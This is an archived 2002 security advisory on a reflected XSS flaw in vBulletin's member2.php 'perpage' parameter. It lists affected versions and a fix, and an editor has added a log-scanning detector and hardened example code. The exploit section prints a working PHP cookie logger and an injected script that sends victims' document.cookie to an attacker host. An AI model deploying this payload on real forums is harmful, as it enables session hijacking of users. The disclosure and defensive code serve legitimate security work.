vBulletin XSS Injection Vulnerability

From: Sp.IC (SpeedICNetat_private)
Date: Sat Nov 23 2002 - 15:13:25 PST

    .:: vBulletin XSS Injection Vulnerability
    
    vBulletin is a powerful and widely used bulletin board system, written 
    in PHP and backed by a MySQL database. I discovered lately a Cross-Site 
    Scripting issue that would allow attackers to inject maleficent code 
    into the pages and execute it in the client's browser.
    
    + Vulnerable Versions:
    
        - Jelsoft vBulletin 2.2.9 Candidate.
        - Jelsoft vBulletin 2.2.8.
        - Jelsoft vBulletin 2.2.7.
        - Jelsoft vBulletin 2.2.6.
        - Jelsoft vBulletin 2.2.5.
        - Jelsoft vBulletin 2.2.4.
        - Jelsoft vBulletin 2.2.3.
        - Jelsoft vBulletin 2.2.2.
        - Jelsoft vBulletin 2.2.1.
        - Jelsoft vBulletin 2.2.0.
        - Jelsoft vBulletin 2.0.2.
        - Jelsoft vBulletin 2.0.1.
        - Jelsoft vBulletin 2.0.0.
    
    + Details:
    
    In the "Start View Threads" block of member2.php, the variable 
    [$perpage] controls how the subscribed threads are listed, so it is 
    meant to hold an integer value [the number of threads displayed on 
    each page]. However, the value of this variable is appended to a query 
    that fetches records from the database, and the script neither checks 
    nor filters its input. If a client supplies a wrong value for 
    $perpage, the script outputs an error message that prints the failed 
    query, and with it the client-supplied value, back to the browser.
    
    + Exploit:
    
        - Run this script on some host:
    
        <?PHP

          // vBulletin XSS Injection Vulnerability: Exploit
          // ---
          // Coded By   : Sp.IC (SpeedICNetat_private).
          // Description: Fetching vBulletin's cookies and storing them in a
          //              log file.

          // Variables:

          $LogFile = "Cookies.Log";

          // Functions:

          /*

          If ($HTTP_GET_VARS['Action'] == "Log") {

              $Header = "<!--";
              $Footer = "--->";

          }
          Else {

               $Header = "";
               $Footer = "";

          }

          Print ($Header);

          */

          Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title>");
          Print ("<Pre>");
          Print ("<Center>");
          Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
          Print ("Coded By: <B><A Href=\"MailTo:SpeedICNetat_private\">Sp.IC</A></B><Hr Width=\"20%\">");

          /*

          Print ($Footer);

          */

          Switch ($HTTP_GET_VARS['Action']) {

              Case "Log":

                     $Data = $HTTP_GET_VARS['Cookie'];

                     // Drops the first 14 characters (0x0D + StrLen ("0"))
                     // of the submitted value before logging it; BCAdd
                     // needs the bcmath extension.
                     $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL))))));

                     $Log  = FOpen  ($LogFile, "a+");
                             FWrite ($Log, Trim ($Data) . "\n");
                             FClose ($Log);

                             // Send the browser back to the page it came from.
                             Print   ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");

              Break;

              Case "List":

                     // The original tested In_Array ($Records) with a single
                     // argument on a variable not yet defined; check the log
                     // file itself instead.
                     If (!File_Exists ($LogFile) || Count (File ($LogFile)) == 0) {

                         Print ("<Br><Br><B>There are No Records</B></Center></Pre>");

                         Exit  ();

                     }
                     Else {

                         Print ("</Center></Pre>");

                         $Records = Array_Unique (File ($LogFile));

                         Print ("<Pre>");

                         Print ("<B>.:: Statics</B>\n");
                         Print ("\n");

                         Print ("• Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n");
                         Print ("• Listed Records : <B>" . Count ($Records) . " </B>[Not Counting Duplicates]\n");
                         Print ("\n");

                         Print ("<B>.:: Options</B>\n");
                         Print ("\n");

                         If (Count (File ($LogFile)) > 0) {

                             $Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A>]";

                         }
                         Else {

                             $Link['Download'] = "[No Records in Log]";

                         }

                         Print ("• Download Log   : " . $Link['Download'] . "\n");
                         // $SCRIPT_PATH was never defined; use the script's own path.
                         Print ("• Clear Records  : [<A Href=\"" . $HTTP_SERVER_VARS['PHP_SELF'] . "?Action=Delete\">Y</A>]\n");
                         Print ("\n");

                         Print ("<B>.:: Records</B>\n");
                         Print ("\n");

                         While (List ($Line[0], $Line[1]) = Each ($Records)) {

                             Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);

                         }

                     }

                     Print ("</Pre>");

              Break;

              Case "Delete":

                  @UnLink ($LogFile);

                  Print   ("<Br><Br><B>Deleted Successfully</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");

                  Print   ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");

              Break;

          }

        ?>
    
        - Give a victim this link:
          member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]

        - Note: You can replace [Script Code] with:
          --><Script>location='http://[Exploit Path]?Action=Log&Cookie='+(document.cookie);</Script>
        
        - Then go to http://[Exploit Path]?Action=List
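    As an added defensive check, not part of the original advisory: a small 
    PHP script (the editor's own code) that scans web-server access-log lines 
    for member2.php requests of the shape above and flags any perpage value 
    that is not a plain integer. The log lines are constructed for the 
    example and the /forum/ path prefix is an assumption; parse_str() 
    percent-decodes the query, so an encoded payload is judged in its decoded 
    form.

```php
<?php
// Added example (editor's own, not from the advisory): flag access-log
// requests to member2.php whose perpage parameter is not a plain integer.
// The log lines are constructed; the /forum/ path prefix is an assumption.

// Constructed Apache combined-format lines: one normal request, one carrying
// percent-encoded markup in perpage, one non-numeric probe, one unrelated hit.
const SAMPLE_LOG = [
    '10.0.0.5 - - [23/Nov/2002:15:13:25 -0800] "GET /forum/member2.php?s=abc123&action=viewsubscription&perpage=20 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '10.0.0.9 - - [23/Nov/2002:15:14:02 -0800] "GET /forum/member2.php?s=abc123&action=viewsubscription&perpage=%22%3E%3Cscript%3Ex()%3C/script%3E HTTP/1.1" 200 1844 "-" "Mozilla/4.0"',
    '10.0.0.9 - - [23/Nov/2002:15:14:40 -0800] "GET /forum/member2.php?action=viewsubscription&perpage=abc HTTP/1.1" 200 1844 "-" "Mozilla/4.0"',
    '10.0.0.7 - - [23/Nov/2002:15:15:11 -0800] "GET /forum/index.php HTTP/1.1" 200 9001 "-" "Mozilla/4.0"',
];

// Pull the request target (path + query string) out of a combined-format line.
function request_target($line)
{
    if (preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[0-9.]+"/', $line, $m)) {
        return $m[1];
    }
    return null;
}

// Returns null when the line is not a member2.php request with a suspicious
// perpage value, otherwise a finding describing it.
function check_perpage_request($line)
{
    $target = request_target($line);
    if ($target === null) {
        return null;
    }
    $path  = parse_url($target, PHP_URL_PATH);
    $query = parse_url($target, PHP_URL_QUERY);
    if ($path === null || basename($path) !== 'member2.php' || $query === null) {
        return null;
    }
    // parse_str() percent-decodes, so %3Cscript%3E is examined as <script>.
    parse_str($query, $params);
    if (!array_key_exists('perpage', $params)) {
        return null;
    }
    $perpage = $params['perpage'];
    if (!is_string($perpage)) {
        $perpage = '(array value)';   // perpage[]=... is never legitimate here
    } elseif (preg_match('/^[0-9]+$/', $perpage)) {
        return null;                  // plain integer: expected traffic
    }
    $reason = preg_match('/[<>"\']|script/i', $perpage)
        ? 'markup or script in perpage (possible XSS attempt)'
        : 'non-integer perpage (probing or malformed request)';
    return [
        'client'  => strtok($line, ' '),
        'perpage' => $perpage,
        'reason'  => $reason,
    ];
}

// Run the check over every line and collect the findings.
function scan_log(array $lines)
{
    $findings = [];
    foreach ($lines as $line) {
        $f = check_perpage_request($line);
        if ($f !== null) {
            $findings[] = $f;
        }
    }
    return $findings;
}

foreach (scan_log(SAMPLE_LOG) as $f) {
    printf("%s  perpage=%s  %s\n", $f['client'], $f['perpage'], $f['reason']);
}
```

    Run it with php from the command line; against the constructed lines it 
    reports the two requests from 10.0.0.9 and stays quiet on the other two. 
    The same check is a natural fit for a WAF rule or a log-pipeline filter 
    keyed on the member2.php path.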
    
    + Solution:
    
        - Under [ // set defaults ] on line 304, paste this code:
    
            // Cast $perpage to an integer before it reaches the query; a
            // non-numeric value such as injected markup becomes 0.
            If (IsSet ($perpage)) {

                $perpage = IntVal ($perpage);

            }
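    To make the root cause and the fix concrete, here is an added example 
    (the editor's own PHP, not vBulletin code) that places the 
    unchecked-$perpage pattern described under Details beside a hardened 
    version of the cast above: the client value is restricted to a bounded 
    positive integer before it reaches the LIMIT clause, the failing query 
    is logged server-side instead of being echoed, and the one client-derived 
    value that is echoed is HTML-encoded. The table name, function names and 
    sample inputs are assumptions.

```php
<?php
// Added example (editor's own code, not vBulletin's). Table name, function
// names and the sample inputs are assumptions. Run with: php perpage_demo.php

// --- Vulnerable pattern (what the advisory describes) ------------------------

// The client-supplied value goes straight into the LIMIT clause.
function build_query_unsafe($perpage)
{
    return "SELECT threadid FROM subscribethread LIMIT 0, " . $perpage;
}

// The failing query is echoed to the browser, so whatever was put in
// $perpage is reflected as live HTML: a reflected XSS sink.
function render_db_error_unsafe($query)
{
    return "<b>Database error:</b> invalid SQL: " . $query;
}

// --- Hardened pattern ----------------------------------------------------------

// Accept only a plain positive integer within a sane range; anything else
// falls back to the default and never reaches the query. (IntVal() alone,
// as in the advisory's fix, also stops the XSS but maps "abc" to 0.)
function sanitize_perpage($raw, $default = 20, $max = 100)
{
    if ($raw === null || !preg_match('/^[1-9][0-9]*$/', (string) $raw)) {
        return $default;
    }
    $n = (int) $raw;
    return ($n > $max) ? $default : $n;
}

function build_query_safe($perpage)
{
    return "SELECT threadid FROM subscribethread LIMIT 0, "
         . sanitize_perpage($perpage);
}

// Keep the query out of the response: log it server-side, show the client a
// generic message, and HTML-encode the one client-derived value that is echoed.
function render_db_error_safe($query, $requested, $logfile = 'php://stderr')
{
    $entry = date('c') . " DB error in query: " . $query . "\n";
    file_put_contents($logfile, $entry, FILE_APPEND);
    $shown = htmlspecialchars((string) $requested, ENT_QUOTES, 'UTF-8');
    return "<b>Database error.</b> Could not list subscriptions with perpage="
         . $shown . "; the administrator has been notified.";
}

// Constructed inputs: a normal value, the kind of markup the advisory's link
// carries, and a plain non-numeric probe.
$inputs = ['20', '"><script>x()</script>', 'abc'];

foreach ($inputs as $perpage) {
    $unsafe    = render_db_error_unsafe(build_query_unsafe($perpage));
    $reflected = (stripos($unsafe, '<script>') !== false) ? 'yes' : 'no';

    echo "input: {$perpage}\n";
    echo "  vulnerable error page reflects <script>: {$reflected}\n";
    echo "  hardened LIMIT value: " . sanitize_perpage($perpage) . "\n";
    echo "  hardened error page:  "
       . render_db_error_safe(build_query_safe($perpage), $perpage) . "\n";
}
```

    For the markup input the vulnerable error page carries the <script> tag 
    verbatim, while the hardened path uses LIMIT 0, 20 and, even where the 
    value is shown, emits &lt;script&gt; rather than a live tag. The logged 
    query goes to stderr here only so the demo is self-contained; in 
    production it belongs in the server's error log, never in the response.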
    
    + Links:
    
        - http://www.vBulletin.com
    



    This archive was generated by hypermail 2b30 : Sat Nov 30 2002 - 12:51:30 PST